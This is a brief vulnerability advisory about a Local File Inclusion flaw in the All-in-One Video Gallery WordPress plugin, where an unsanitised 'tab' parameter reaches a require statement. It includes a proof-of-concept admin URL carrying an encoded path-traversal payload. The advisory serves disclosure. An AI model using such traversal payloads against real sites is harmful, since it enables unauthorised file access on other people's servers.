The plugin does not sanitise and validate the tab parameter before using it in a require statement in the admin dashboard, leading to a Local File Inclusion issue
https://example.com/wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex